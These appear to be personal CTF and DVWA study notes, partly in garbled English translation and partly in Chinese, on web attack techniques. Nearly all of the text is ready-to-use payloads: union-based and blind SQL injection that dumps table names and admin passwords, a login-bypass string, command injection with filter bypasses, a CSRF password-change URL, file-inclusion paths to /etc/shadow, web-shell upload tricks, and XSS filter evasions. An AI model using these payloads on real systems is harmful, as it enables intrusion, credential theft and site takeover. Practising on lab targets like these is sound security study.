In all kinds of learning ctf learned knowledge to web-based security
ffifdyop md5 encryption reconstitute sql equal $ sql = "select password from users where password = '' or '<xxx>'" for bypassing md5 detecting
image steganography tips txt gif image transposable layer using ps see
document. cookie = "cookiename = cookievalue" cookie change
see "._" typically Morse code
the Base64 AZ, AZ, 0-9, + /;
Base32 AZ, 2-7;
Base16 (hex) 0-9, the AF
Base encryption if digit missing, will use the '=' filled, so see the '=' may try to decrypt Base
see "% number" url decoding available
, see "& # number;" Unicode encoding to
appear only as "[] ()!" jsfuck encoding
only appears "> <+ -, []." to encode brainfuck
---
injection MYSQL numeric Summary:
error echo:
'1 = 1 1 = 2 determines implantation may
order by N number of search fields
and 1 = 2 union select 1,2,3 ... N look normal echo, echo data for displaying normal
and 1 = 2 union select database ( ), version () library name and version check
and 1 = 2 union select 1, group_concat (table_name) from information_schema .tables where table_schema = database () # 2 look-up table number field name
and 1 = 2 union select 1, group_concat (column_name) from information_schema .columns where table_name = 'admin '# 2 check the number of fields in field name
and 1 = 2 union select 1,2, group_concat (table_name), 4 from information_schema.tables where table_schema like database () 4 number field name lookup, like can be replaced with =
and = 2. 1 union select 1,2, group_concat (column_name) , 4 from information_schema.columns where table_name = 'admin' 4 field number field name search
and 1 = 2 union select group_concat ( username, '-', password) # 2 the number of fields from admin check field value
and 1 = 2 union select table_name from information_schema.tables where table_schema = database () limit N, 1 -by-table queries
and 1 = 2 union select 1, SCHEMA_NAME, 3,4 from information_schema.SCHEMATA limit 0,1 information_schema search database table
's note: Examples 2 and 3 are normal echo, echo 1,4 abnormality " and 1 = 2 "can be replaced id = -1 i.e. the error state, from a statement to be placed in a normal echo
---
username sql injection: 'or 1 = 1-- i.e. master password
---
non-error echo :
'and SELECT GROUP_CONCAT Union (table_name) from information_schema.tables WHERE table_shcema = Database () and' 1 '=' 1 have front 'has the' 1 '=' 1, other similar error echo
---
hash value 0e at the beginning (after PHP hash username is 0exxx):
240 610 708 == 0e462097431906509019562988736854
QNKCDZO == 0e83040045199349405802421990339
aabg7XSs == 0e087386482136013740957780965295
aabC9RqS==0e041022518165728065344349536299
反序列化构造:a表示array;i表示int;s表示string,汉字单位3,字母及数字单位1;b表示布尔;
a:2:{s:4:"user";b:1;s:4:"pass";b:1;} 可保证$data_unserialize['pass']=='???' ?为未知
---
DVWA系列
MYSQL注入
构造语句类似:
1' or '1'='1
1' union select XXX
爆破Brute Force
burp->send to intruder->attack
万能密码
命令行注入command injection
ping 127.0.0.1 & net user
&&/&后的命令是攻击命令
绕过过滤:ping 127.0.0.1 &;& net user
127.0.0.1|net user |作为管道符号,作用是前面语句作为后面语句的输入,并只输出后面
跨站请求伪造CSRF
例:http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=hacked&password_conf=hacked&Change=Change#
其中,?password_new=hacked&password_conf=hacked&Change=Change#为CSRF攻击,即将密码改为hacked
该手段可与短链接、伪造网页+图片加载的形式(img src)联动,且网页可命名为被攻击者的ip,绕过Referer过滤
文件包含File Inclusion
例:
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=/etc/shadow 先用此条探查是否Linux,不是则会爆出服务器文件的绝对路径
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=F:\XAMPP\htdocs\dvwa\php.ini 绝对路径探查
..\..\..\..\..\..\..\..\..\xampp\htdocs\dvwa\php.ini 相对路径
http://192.168.5.12/phpinfo.txt 远程文件包含,有过滤可写成htthttp://p: 之类,可选用url编码进行增加隐蔽性,但有可能增大失败几率
file:///C:\Users\shadow\Desktop\hack.txt 本地文件包含,上传文件后利用file协议可达成攻击
文件上传File Upload
传马,菜刀连接
图马:上传,1.利用文件包含page=http:xxx,用菜刀连接上面的地址
2.burp抓包改filename,菜刀连接
3.当Magic_quote_gpc=off时,图马改名为xxx.php%00.png %00是/0的url编码
4.用copy命令将图片和马合并,菜刀连接page=file:\\\xxx
不安全的验证码Insecure CAPTCHA
burp抓包改参数或构造CSRF
SQL injection
与之前类似,当无input时,用burp抓包来输入
遇到关键字转义,可用hex编码绕过 注意,16进制用0xnumber表示
SQL Injection(Blind)盲注
注:此处以字符型注入为例,数字型注入不需要加'
布尔型
1' and 1=1# 1' and 1=2# 检测布尔盲注
1' and length(database())=1# ... =n 检查数据库名长度,也可改=为比较符号,使用二分法
1' and ascii(substr(database(),1,1))>97 and ascii(substr(database(),n,1))<122# 二分法逐字猜接库名
1' and (select count(*) from information_schema.tables where table_schema=database())=n#猜解表的个数,*可写成table_name
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit n,1),1))=1# 爆表长度,n为第几个表
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit n,1),m,1))>97# 同之前二分法爆表名,n(从0开始)代表第几个字符,m(从1开始)代表第几个表
1' and (select count(column_name) from information_schema.columns where table_name= 'users')=1# …=n 爆字段数
1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=1# 爆字段长度
1' and ascii(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1,1))>97# 同之前
注:与sql注入类似,只是用length()=n判断长度,select count判断数,ascii(substr())判断名
时间型
1' and sleep(5)#有延迟
1 and sleep(5) #无延迟
综上则存在字符型基于时间盲注
1' and if(length(database())=1,sleep(5),1)# …1' and if(length(database())=n,sleep(5),1)# 爆长度
1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)# 爆名
与布尔型类似,只是多了if(xxx,sleep(5),1)
XSS跨站脚本攻击
反射型XSS
http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<script>alert(/xss/)</script>#
其中<script>alert(/xss/)</script>为攻击语句
绕过:复写,比如屏蔽了<script>,可写成<scr<script>ipt>alert(/xss/)</script>#
或者是大小写混用,仍是屏蔽了<script>,可写<Script>alert(/xss/)</script>#
图片形式:<img src=1 onerror=alert(/xss/)> 其中alert(/xss/)为攻击语句
存储型XSS
找到输入位置如input,写攻击语句,基本同上
若出现字数限制,burp抓包修改
绕过同上
XSS触发 <input value="xxx "onchange=xxx()""> "为"的ascii码,可结合CSRF使用